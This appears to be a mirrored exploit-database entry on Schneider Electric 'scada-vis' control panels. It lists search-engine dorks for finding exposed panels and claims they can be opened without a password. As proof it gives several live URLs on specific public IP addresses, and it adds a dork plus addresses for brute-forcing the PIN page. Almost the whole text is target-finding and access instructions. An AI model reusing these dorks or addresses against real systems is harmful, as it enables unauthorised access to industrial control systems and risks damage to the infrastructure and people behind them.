Schneider Electric v1.0 – Directory traversal & Broken Authentication

• Exploit Database
• 99 阅读

• 作者： Parsa Rezaie Khiabanloo
  日期： 2023-04-07
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51320/

• # Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication 
  # Google Dork: inurl:/scada-vis 
  # Date: 3/11/2023
  # Exploit Author: parsa rezaie khiabanloo
  # Vendor Homepage: https://www.se.com/
  # Version: all-versions
  # Tested on: Windows/Linux/Android
  
  # Attacker can using these dorks and access to the panel without password
  
  inurl:/cgi-bin/scada-vis/
  
  inurl:/scada-vis/schedulers
  
  inurl:/cgi-bin/scada-vis/index.cgi
  
  inurl:/scada-vis 
  
  inurl:/cgi-bin/scada-vis/touch.html
  
  POC :
  
  http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi
  
  http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html
  
  http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi
  
  
  # Attacker can these this dork for bruteforce the panel 
  
  inurl:/scada-vis/pin?return=index
  
  POC : 
  
  http://143.176.129.1/scada-vis/pin?return=index
  
  http://62.163.74.206/scada-vis/pin?return=touch
  

  Python

  Copy